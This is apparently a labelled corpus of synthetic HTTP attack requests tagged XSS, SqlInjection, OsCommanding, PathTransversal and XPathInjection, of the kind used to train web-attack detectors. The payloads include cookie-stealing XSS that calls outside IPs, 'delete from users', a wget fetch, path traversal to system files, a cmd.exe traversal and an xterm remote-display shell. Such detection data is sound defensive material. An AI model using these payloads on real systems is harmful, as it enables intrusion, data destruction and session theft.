GET /oauhg2as/hertel7t5sitOime/Dth/0sF/iP7WSx71uRa.TiW/eMD1ABET5/d@V0RlwLjRRf8WXVnD/-DA.tiff?dtwa=scriptgtt4&Ha=049%29%28%26%28objectClass%3DeeEr%29%28%7C%28sn+++%3D++++eWlo%29%28cn%3Dso+++++J*%29%29&lrDghesa=aAi&httpXHtaL0ku.Ppasswd=%2Fy&fheg=rhasTde&tnAlgixyadtpt=oLNtJm2&fTendhnieyij=obbzitmn%7Er8y&EwrdwtY=6414711 HTTP/1.1
Host: 86.204.90.241:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.9, compress;q=0.8, gzip, gzip
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="4"
Date: Sat, 07 Aug 04 05:59:06 UTC
ETag: "wOq5RcWCDamiFvJi"
Expect: 100-continue
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Thu, 25 Oct 07 16:53:49 CET
If-Match: *
If-None-Match: "A08GaTbf-kkyIxM5"
If-Range: Wed, 28 Feb 07 05:55:11 CET
Max-Forwards: 999
MIME-Version: 7.8
Pragma: bNvleg=thevo
Proxy-Authorization: fnitn eCTeeuhe=Ltdusgh
Authorization: NTLM N2MzMmRNOXR0b3JMbmVlUmJhcnJ6dWV2MjVkZG50a1JmaWVuYQ==
Range: -004662,03-,-2001
Referer: http://www.eoir6m0.st/o1tmn4m/cate/dgnh1ht/isth/elHei.msf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.3 (compatible; Konqueror/5.3; Open BSD i386; weniem; trtlwQgth; jnekwcfn)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/5.7 172.19.228.35, 6.9 138.132.10.211
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37909
Start - Id: 50040
class: XPathInjection
POST /iWspth/tWwxG/aYg-3R5d7pnr4TfaVC.gif? HTTP/1.0
Content-Length: 41
Content-Language: mnNoeot5,cfdShiaa
Content-Encoding: compress
Content-Location: http://aouaaor.de/eeibN/sI3y/txnlN5w/Lllbl/OeOLpl.css
Content-MD5: YU5weUZuaXVScWV0aUh0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Apr 04 11:30:16 UTC
Last-Modified: Thu, 03 Apr 08 21:14:56 GMT
Host: www.lzbtfqwz.cz
Connection: close
Accept: application/*;q=0.6, application/zip, video/*
Accept-Charset: iso-8859-3;q=0.0, windows-1251
Accept-Encoding: (i  <     count(teyoy/child::text())   and     j  <  count(adln/child::comment()) and   k   <    count(lbistm/child::*) )
Accept-Language: *
Cache-Control: max-stale=63
Cookie: tzhe4doaseh=f9hoIyrdi;ne
Date: Fri, 13 Jan 06 11:20:23 GMT
Expect: 100-continue
If-Modified-Since: Sun, 16 May 04 19:49:18 GMT
If-Unmodified-Since: Fri, 21 Oct 05 20:17:02 GMT
If-None-Match: "pX8p4WY8Fy8gf1M-nSFX"
If-Range: Sun, 31 May 09 05:36:09 UTC
Max-Forwards: 8
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM YmRuZWVhZWVyd3kydHNhb2NmS01oZW95MmRJbGxrc2lpdDFv
Referer: http://sts2.fr/vcueehi/um3hx/BaupneR/3entadla/5ng4ow.jpg
TE: chunked,trailers
User-Agent: dwr1e/9.7.4.1.8
UA-CPU: MIPS
UA-OS: Solaris
Via: HTTP/8.4 99.15.121.86, HTTP/0.9 74.184.16.68
Upgrade: 4AnI/4.6, Mi0vm/0.4, aaabch/0.4, e9ei5t/7.3
Warning: 506 www.yot0sp.css:0 "13chsryancyt" "Sat, 14 Aug 04 10:36:35 CET"
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sjdZtmpEFI=6lyden&Scopy_8C2kWF=8936075643

End - Id: 50040
Start - Id: 36053
class: PathTransversal
GET /y3wgetJqY_DXt/atKSpsotncen0aioapl/e6nYja/rssedoboroEgo/syocdeay/eEPVtA1@/D0WIaeVob/erLQjdh-4FGhU/WAjCDI2BIx/4Ige/ltic.swf?s0asayaed=2470142553&os6jera=265753&lmphoeybFtHdT1=ioiNperlcat%3Ep9%7Chftp&g6lfbctfxR=%29&Fddvar6iK30f=646&Zexterm3F08_I=bOSyIx-C2&n@yjdmnK4=StYnAnhoiTs&inu9gg=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&etc-dz0ktH=eio5snen2ikfhn&azbehkm=oe%3Fl-paacnEwwNtSy5e&wKQ48JNvV=o&ox5=Sfyuckmsriexdshda&hiOrrnawjociMi=2498653&uiooIyxwea=nnpeWNetia HTTP/1.0
Host: 237.77.218.183:87
Connection: xetS
Accept: image/*;q=0.6, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=44
Client-ip: 54.187.94.95
Cookie: iw02cdhrise=t9c;PzkwnedllssOc=82654;odnliw22ol8=8472;Ar=mHVYtq.6
Cookie2: $Version="03"
Date: Sat, 09 Feb 08 02:05:26 GMT
ETag: "G3-c5vBGiX1v8Nv"
Expect: sntd
From: Odatte@nazuaen.net
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Fri, 14 May 04 21:36:56 GMT
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: *
If-Range: *
Max-Forwards: 446
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM dUszdjFsdmluY3ViYnZTcmFFcjBlc25zcnRCM3lnblJldXds
Authorization: Digest nc=05dd6aeD
Range: -676,1810-88717,49-
Referer: http://oalrrio.it/ifdtcfe.php4
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (compatible; Konqueror/3.2; Unix; nent; tm13mu; ot31Orogse)
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 919 47.112.49.170 "uvicSPonns9rssR" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 2881124035235
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36053
Start - Id: 43117
class: OsCommanding
GET /2Yki/0ne9Ed.htm?n7s=86&fOJHaTet=%22++%3B++%2Fusr%2Fbin%2Fwget++++www.ladees.com%2Fse+++%3B&emiae=etr&nuheemjsmio=%25u%5Bpositionr&y4eeaod=cPqDl.&CUX8=autoexec4t&tdo=faQJn1Vf&j61ply=smodN&srkvda=sOinsertePe0sruo7n&Gut8tDwiyyonru=5996654&XJHm=6iosoebHtfrom%27e HTTP/1.1
Host: www.CLtnereE.org
Connection: deiT
Accept: text/*
Accept-Charset: euc-tw;q=0.4, hz-gb-2312, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: UIh-saea, adnm3t-n2sq;q=0.9, UTN-oXmame, tgawa-ioesiFr, w0weyaL-myoonndH
Cache-Control: min-fresh=281
Client-ip: 124.119.190.58
Cookie: kytrg=sa\$zE2tztg;Bnetcat1V_JeaFH=ae rargoktu5lsystemd>u;eathptoTor=5615656
Cookie2: $Version="389"
Date: Wed, 28 Sep 05 10:41:39 GMT
ETag: W/"g2ZIY_5ttDur@Sre"
Expect: lsdemu=enrq;tlgMa=hYsee
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Tue, 08 Jul 08 20:51:15 GMT
If-Match: "pCasrwTjgtUL7@SM"
If-None-Match: "8ODR71PETYz_54nD"
If-Range: *
Max-Forwards: 1
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: http://www.shtu5esc.com/jk3imco/3rtm.php3
TE: deflate;q=0.4
Trailer: Host
User-Agent: v-@CrLjgu http://www.edqrk.fr
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 603x2268
Via: 9.7 www.adeE.tiff
Transfer-Encoding: gzip
Upgrade: gst/8.6
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43117
Start - Id: 47660
class: XSS
GET /pZZJsqIovL5/igbBJVqQeE/es/oeiemysntddRai/otdEep5oap8n/nm7ibn/zKfW1POj_gq-w/5sMuZuEeLoImzG.php?brexecJO=83391&cet7dye0eer=%3Cscript+++%3Ealert+%28oorArcIhod4yNm.tBean%29%3C%2Fscript%3E&raCnaxtefga89ty=2OtmetaautoexectEr%27t&hsAioR=2A&giyds6ieMtH=aH2%7Eikxdlbsot&hganrrseehidzml=%5Cd&odooewhe=oumetawyh&ojnncoh4pslma=80740&.rm9T0shutdown=r4eof&nPwIEde=7726800388&GIxQt-bZWZa5=vZCa HTTP/1.0
Host: 103.240.175.80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.4, x-mac-cyrillic;q=0.6, windows-874;q=0.5, hz-gb-2312;q=0.5, iso-8859-9;q=0.3
Accept-Encoding: compress;q=0.1, compress;q=0.5, identity;q=0.4, compress;q=0.7, deflate;q=0.1
Accept-Language: e0d-ir
Cache-Control: no-store
Client-ip: 39.154.184.38
Cookie: neara7n6r=Tja9essshhe;atTc=adeeRFl;A.QX=awWSzqCxdfYk
Cookie2: $Version="6"
Date: Tue, 23 Feb 10 09:39:44 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 28 Aug 09 23:06:32 CET
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 15:22:52 UTC
Max-Forwards: 23
MIME-Version: 7.7
Pragma: edtogof='ettrone'
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: /uatb/eeliEs/tet3t/norsj.cfm
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 2.0; fn-3A; rv:9.7.5) Gecko/35347352
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7165x674
Via: 4.9 23.1.222.104
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 452 www.Iau7Ie.jpeg "2HekEIt" "Sat, 30 Apr 05 16:23:39 UTC"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47660
Start - Id: 47549
class: XSS
GET /2jPmailperlyXBYRLP.html?wWe6gC3I05KF=%3Cimg+++src+%3D++++%22++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F117.158.117.52%2Fnggeal.mspx%27%2Bdocument.cookie%29%3B%5D++++%22+%3E HTTP/1.0
Host: 171.65.188.55
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=6368
Client-ip: 120.244.182.14
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Fri, 24 Aug 07 09:57:49 GMT
ETag: ".hOL6y3DPe6aw9Q5di1"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Wed, 21 May 08 10:09:46 GMT
If-Unmodified-Since: Fri, 14 Jan 05 13:51:57 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Fri, 06 Jul 07 20:31:04 GMT
Max-Forwards: 9845
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Basic Y21lbjpvbW9hc2U=
Range: 2718-09734,749039-
Referer: http://www.sntcAec.biz/tE8feoh/Essst.sh
TE: deflate;q=0.3
Trailer: Referer
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 6.7; av-in; rv:3.8.2) Gecko/49143911
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47549
Start - Id: 42193
class: SqlInjection
GET /TW_qUTj5-z28DvG/7eb/tw--833820aTI/eO0hSesfTdloscnz3/f0tqMstimeDAamLi/oWhttpsRpbtI7gt_xcwp-/oulnGxOTIO/iDu/SH-3E1U9.exe?uRhmLsedel6=vwn%27ha8n&iuSe7=gtm&0vwindow.open9o=46828854&yIX-gbtK5w=y+e&esnenOtrie5f=ituf&ctoxsRgpgrane=eoewp-i&nph-xbgsound6pzphpLRsam=son+R&nLu7n=e7hs&niesds9bm=79189567&q2b6fSI6r=41340&igAiFMMKuWqj=734340&ectiiedeO=aee6t&oeixtdqltrq=%27++++%29%3B+++++delete+from+users%3B+commit%3B++++dummy%28++%27&obtemIr9Tn=asq HTTP/1.1
Host: 0.253.168.30
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, gzip, deflate;q=0.8, compress;q=0.3, gzip
Accept-Language: Fn4foh-vtrrsn, lwo-dhbB76oe, fesnSe-syu, eetO-ew
Cache-Control: no-store
Client-ip: 137.86.250.225
Cookie: 37aoTl3liton=364;xhsodXthdnhRtpt=379927
Cookie2: $Version="346"
Date: Wed, 09 Dec 09 10:03:01 GMT
ETag: W/"mDVvfRc_ydIMiZa"
Expect: irpp0=cI1o9hea;esvtet
From: bnR1@rhaYn.be
If-Modified-Since: Fri, 21 Oct 05 02:29:51 GMT
If-Unmodified-Since: Mon, 21 Jan 08 09:22:38 CET
If-Match: *
If-None-Match: "PIHkw8WjjlQkgHYIr.N"
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: e0='miaas'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nc=D9Efa2bf
Range: -3,97623-
Referer: /2eian3c0/os7uo/cGmy/adce.asp
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (Windows; U; WinNT 9.8; eu-dT; rv:7.8.6) Gecko/59276235
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: FTP/9.6 91.64.8.25
Transfer-Encoding: ioCW
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 28598
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42193
Start - Id: 47104
class: XSS
GET /tFoinrddnocty/iADCv/ot7Em2AVSFnqVk/zpassthru5.FSshutdownoXzUIM/ytfxltroidiaT9h/AdcDuG3evalL1VmT/1Nw8N3GAp0t211_1O6lS/sob/edt2qH12XoUZ48csoovw/ars7tNtaisijdOdvahnc/aUp@Cx3-0RxJZGV.shtml?ceh=ae%27ot&2eendm2iomytio=%3Clink+++rel++%3D++%22++++stylesheet%22++++href++++%3D++++%22+javascript%3A+++%5Balert++++%28%27oeanuM%27%29%3B%5D+++++%22%3E HTTP/1.0
Host: 51.141.0.165:8
Connection: close
Accept: text/html, text/*;q=0.4, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: vahg8ss0-haavirEe;q=0.4
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: z8h-90G3WE=sAea7;omn=xubrperl17>8
Cookie2: $Version="1"
Date: Mon, 18 Oct 04 02:54:52 GMT
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: SuneNo=naithni;emlsz
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Thu, 13 Jan 05 23:29:20 CET
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: "pgepITLsvgPUY0clG0p_"
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: /hcapEe/4ensu/wpp7a.jpeg
TE: deflate;q=0.3
Trailer: If-None-Match
User-Agent: eedtte/3.7
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 320x898
Via: FTP/4.5 www.hhacseim.css
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 236782108
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47104
Start - Id: 46657
class: XSS
GET /vj/ikjU1PF/t6noqs.asmx? HTTP/1.1
Host: www.yi62iln.be
Connection: close
Accept: video/*;q=0.7, image/gif;q=0.4
Accept-Charset: cp-950;q=0.6
Accept-Encoding: identity, identity;q=0.5, gzip;q=0.1, deflate;q=0.2
Accept-Language: *;q=0.7
Cache-Control: min-fresh=09
Client-ip: 65.174.255.51
Cookie: toph=<!-- -- --><script>[window.open('http://252.109.190.104/merast.cgi'+document.cookie);]</script  ><!-- -- -->;CfQqAhavingj5=objectwe- jnullbody:adhRu;gO=a~[nnodei2heboot.iniCeo
Cookie2: $Version="977"
Date: Fri, 09 May 08 10:59:09 GMT
ETag: W/"UZZb2JZhOTt71FjvfCKp"
Expect: hvBa=iesaIq
From: iam9mt@lo1hek.gov
If-Modified-Since: Sat, 23 Dec 06 09:49:04 GMT
If-Unmodified-Since: Sun, 17 Feb 08 02:20:27 GMT
If-Match: *
If-None-Match: "cNaMXmbMfNLiArZ4"
If-Range: Fri, 28 Jul 06 09:35:25 CET
Max-Forwards: 5
MIME-Version: 0.5
Pragma: AFeqt=3hse
Proxy-Authorization: NTLM eTVpdDM2dHdnbnN6ZWRzZWQ5Y29lbGpFcmVzdHRvd28=
Authorization: NTLM ZHZhYWtldG5lcDJueklpQlplb2ViZWhuc2lkb2tlNHRsc2R0ZmVpNGRpclNP
Referer: http://www.srans.org/bdtveh5i/2lrn/Zga2tft/ulo2.jpeg
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: dbF6lJaV http://www.5aet06qy.gov
UA-OS: WinNT
Via: HTTP/0.4 www.oOu1de.shtml:3516, 2.7 www.nii6.jpeg
Transfer-Encoding: gzip
Upgrade: pesis/7.5, lqrttT/4.6, bTsote/3.0, cstc/2.2, peotn/4.0
Warning: 466 152.152.48.226 "ecjo" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46657
Start - Id: 43074
class: OsCommanding
PUT /taArsaanmynnmlonn/ecU1/smre0onslim/oewfiaeoece/er4IMe3vbg-p/3nMhx6-lLd_EB1ua.htm? HTTP/1.1
Content-Length: 240
Content-Language: a6
Content-Encoding: compress
Content-Location: /tsrZlU.gif
Content-MD5: b3h0bjhlVGl5ZXJhYW1sdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Mar 05 16:15:36 CET
Last-Modified: Mon, 17 Jul 06 11:37:12 UTC
Host: 206.74.7.200
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.7, utf-7, big5, x-mac-korean;q=0.2, windows-1250;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 107.196.75.237
Cookie: gc8socb=eec;tarq=ah;
Cookie2: $Version="611"
Date: Sat, 13 Jan 07 16:37:02 UTC
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: aa20=ttt7;i0sl
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 22 May 04 13:22:12 UTC
If-Unmodified-Since: Sun, 19 Oct 08 12:05:35 UTC
If-Match: *
If-None-Match: *
If-Range: "nFYupowMN3Zw0Xnal"
Max-Forwards: 211
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM Y29obnRyYWZpbzRzR2FhYW9iMWlzcnRuMjdhcHRlZm5hdGlu
Authorization: NTLM aGNUMW5vc2Zmb3N5MnJvY2RuYXI2OHVuNDlhZGhzejdyYW5yaW50ZWVnbGJlbWw=
Range: 53-,7351-3480
Referer: /tffL7nHs/imrSo.jpg
TE: chunked;q=0.4
Trailer: Accept
User-Agent: Tdfinlos5Dielbe
UA-CPU: MIPS
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0020x804
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

9ktao3aaevkyb=|   /usr/openwin/bin/xterm+-display+221.14.78.168:0%00&8hc=0810&epkryaeig=vhn&onwlPhvhm=497&snu9t= hdsi&e4mutkDi8r51=izh&qeriss=os&m&1rcpCaEy=8208337&uCEmzoquG1=ose s$89edoikr:sgtmpdi&arewmnIloD=5619209

End - Id: 43074
Start - Id: 43760
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 95.159.231.228
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-950, cp-932, x-mac-japanese, koi8, x-mac-icelandic;q=0.7
Accept-Encoding: compress, identity;q=0.4, compress;q=0.1
Accept-Language: *
Cache-Control: max-age=07907
Client-ip: 20.184.151.54
Cookie: peDthio=17lnd;tLi5okfRnqntfyf=stamincludecneroiBR;apUaLf=e6angsobdtstaag4;oinar=tpbBqpvUalc;herr5TYosikd=eop2
Cookie2: $Version="1"
Date: Tue, 13 Mar 07 12:19:14 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Wed, 19 May 04 09:48:29 UTC
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 839
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Digest opaque="0s1iie9e"
Range: -541349,6-1
Referer: /codmS/ob3ito/aabtacn.jsp
TE: deflate,deflate,chunked;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 8.5; t9-dr; rv:4.9.6) Gecko/41670706
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5283x402
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: 3orag7; ephdn=epseiipr
Upgrade: yhotE/7.5, Kihlr/2.4
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43760
Start - Id: 45148
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: 91.232.183.243
Connection: keep-alive
Accept: audio/x-wav;q=0.2, image/jpeg;q=0.6
Accept-Charset: x-mac-korean, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 117.16.100.183
Cookie: atetat=gihqy;c7eitysslr5=55;thdrxeqietarz=95;reanlli5=7lq9:a;eeeaerh7uE=8l|a;QehtaccesciWqxY=sdrgciy
Cookie2: $Version="1"
Date: Sun, 15 Mar 09 24:41:19 CET
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: "A-cZu7Kjl4eTXlVXv"
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 871
Pragma: HhB='Teisth'
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: ohtgA hnbcjanf=tt6y
Referer: http://www.qpsAifm.de/ae2wr.tiff
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.2 (X11; U; Linux i386 5.2; ex-to; rv:2.6.2) Gecko/17083230
Via: 0.9 48.110.242.45
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 249.70.128.210
----: ----------------------------------

null

End - Id: 45148
Start - Id: 47655
class: XSS
GET /n@XnqnFG2N/oo33nre4cctfnlsidr/Mnsp/rBZmkQh/3jtQ4s1WUlBxbin/mmu7TMsnmRIDuhditott/M-_aU4ZRJ.gif?eaL5l5seigdtri=LfallOngroup+by%29rOnr&icrdamai0tr4r=54&ssock_stream02wform=%3Cscript+%3Ealert+++%28aciaineoe.unru%29%3C%2Fscript++%3E&rmtmqcn=lus&PdX458tincludehttpsKWa=q&i4iGne=rnhA&ueranlAtmfmwur=te+xrs%29nn&cefClchwnhh=torcpeE&hxp_Dyprocessing-instruction9gJKV=tay HTTP/1.0
Host: www.lnmchAanla.com
Connection: sdieR
Accept: application/*, application/*;q=0.3
Accept-Charset: macintosh, koi8-r, x-mac-icelandic;q=0.9, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: eie-sEEmgei;q=0.3, 5mr-sx06euj, idtcigno-8sojtT, hRRinehb-euAa;q=0.9
Cache-Control: max-age=0
Client-ip: 56.155.32.167
Cookie: niEg4garrmtihf=hL3z7r;cy8Tfhl=iepunrgenc;kOoHrfutD=tZ3QP;bcenesRq=692180;xRAdoAEh=1w1tm;L6GkanE=8801064
Cookie2: $Version="8"
Date: Sun, 05 Apr 09 04:47:30 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: varybo=Gdejuu9m;vcuie=deknnr
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: NTLM Y1RkYnJleXZkdWNtRWloeWRia2hYc29Ob3RnY21KdHg2MXdwZXpFc3R1Y3YyZQ==
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: http://www.nfeof5df.net/evSC/NtibhW.tiff
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: nOuoahRedodsad
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 101x052
Via: 0.8 www.ncptlqns.tiff, 4.2 67.49.8.177, FTP/9.6 217.62.30.31
Transfer-Encoding: es9es
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47655
Start - Id: 43649
class: OsCommanding
PUT /iadYe/eg02tat0/ceo7aatrpfonnbrt/dXNoiWg/dsohaadL4t7Otigeer.css? HTTP/1.0
Content-Length: 275
Content-Language: 3hotdf,munc,i
Content-Encoding: identity
Content-Location: /h84n.php3
Content-MD5: em1lbm91ZXV0WXIwaE9zbA==
Content-Type: application/x-www-form-urlencoded
